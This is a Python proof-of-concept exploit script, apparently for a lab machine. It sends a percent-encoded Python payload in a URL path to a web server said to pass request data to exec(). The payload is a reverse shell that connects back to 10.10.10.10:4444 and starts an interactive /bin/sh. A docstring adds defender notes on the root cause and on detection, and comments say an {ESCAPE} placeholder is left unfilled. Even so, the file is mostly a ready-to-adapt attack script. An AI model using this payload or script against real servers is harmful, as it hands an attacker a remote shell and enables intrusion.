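#!/usr/bin/python3
"""Proof-of-concept request for a code-injection flaw in a lab web server.

The script builds a URL whose path carries a percent-encoded Python
statement and sends it with a single GET request. According to the author's
own comment, the target passes part of the request path to ``exec()``; that
server-side behaviour is not visible in this file.

Both addresses below are RFC 1918 private addresses.

Notes for defenders:
* Root cause, as described by the author's comment: request data reaches
  ``exec()``. The fix belongs on the server: never build ``exec()`` or
  ``eval()`` input from any part of a request, and resolve paths through a
  fixed lookup instead.
* What this looks like in telemetry: request paths containing
  percent-encoded Python source (``import%20socket``, ``os.dup2``), the web
  server process spawning ``/bin/sh -i``, and a new outbound TCP connection
  from the server to a non-standard port (4444 here).
"""
import requests
import subprocess  # not used by this script; the payload string carries its own import
# Import the submodule explicitly: a bare `import urllib` does not guarantee
# that `urllib.parse` is loaded, it only works when another module pulled it in.
import urllib.parse

# Base URL of the lab web server.
url = "http://10.10.10.168:8080/"

# {ESCAPE} needs to break out of the scripts exec function and back in
# NOTE: {ESCAPE} is an unfilled placeholder. No str.format() call follows, so
# as posted the literal text "{ESCAPE}" is what gets sent.
# The statement between the placeholders opens a TCP connection to
# 10.10.10.10:4444, duplicates that socket onto stdin/stdout/stderr, and
# starts an interactive /bin/sh on it (a reverse shell).
command = "{ESCAPE}import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);{ESCAPE}"

# Percent-encode the statement so it can travel in the URL path.
injection = urllib.parse.quote(command)
payload = url + injection

# Show the exact URL being requested; the same string is what a server
# access log would record for this request.
print(payload)

# No timeout is set, so this call blocks until the server answers.
r = requests.get(payload)
print(r.text)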